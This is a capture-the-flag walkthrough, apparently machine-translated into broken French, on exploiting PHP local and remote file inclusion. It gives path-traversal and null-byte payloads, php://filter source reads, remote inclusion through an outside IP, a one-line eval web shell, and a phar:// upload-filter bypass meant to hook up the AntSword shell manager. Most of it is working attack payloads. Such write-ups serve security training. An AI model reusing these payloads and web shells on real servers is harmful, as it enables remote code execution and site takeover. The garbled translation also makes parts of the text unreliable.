Un.、Le fichier local contient(Base)

1、Le premier.

2、Deuxième voie

....//....//flag.txt

3、Troisième

....//....//flag.txt%00

4、Quatrième

....//....//....//flag.txt%00

2.、Le fichier local contient(Pratique.)

1、Le premier.

php://filter/convert.base64-encode/resource=../key.php

2、Deuxième voie

2.1 Voir le code source de la page de réponse

 Voir le code source de la page de réponse , Aucune information utile .

Accès directview.htmlDocumentation,Et voir le code source.

2.2 Paramètres entrants

2.3 Voir le code source

Trois、Le fichier distant contient(Pratique.)

1、Le premier.

1.1 Ouvrez le sujet

1.2 Essai préliminaire

1.3 Le fichier distant contient

 Impossible de tronquer , Remplacer le fichier distant contenant .

1.4 Lien fourmi - épée

http://49.235.78.245:1117/start/index.php?page=http://49.235.78.245/1

2、 Démarrer un serveur distant localement

2.1 Un mot dans le répertoire des utilisateurs

1.txt
<?php @eval($_POST['c']);?>

Table des matières：
C:\Users\Administrator

2.2 Démarrage

python3Mise en œuvre：python3 -m http.server
python2Mise en œuvre： python2 -m SimpleHTTPServer

2.3 Succès

http://192.168.1.107:8000/1.txt

3、Deuxième voie

3.1 Voir la source du sujet

3.2 Lireinclude.phpEtupload.phpCode source

php://filter/convert.base64-encode/resource=include

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
    
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
    
            echo "<p> error! </p>";
        }
        else
        {
    
            include($file.'.php');
        }
    }
?>

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
    
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in: " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
    
        echo "upload failed!";
    }
}
?>

3.3 Télécharger des fichiers

180.php:
<?php @eval($_POST['c']);?>

1、180.phpÉcris un mot;
2、180.phpComprimé à180.zip;
3、Réécriture180.zipPour180.jpg

3.4 Lire le fichier

?file=phar://upload/180.jpg/180
c=phpinfo();

3.5 Lien fourmi Sword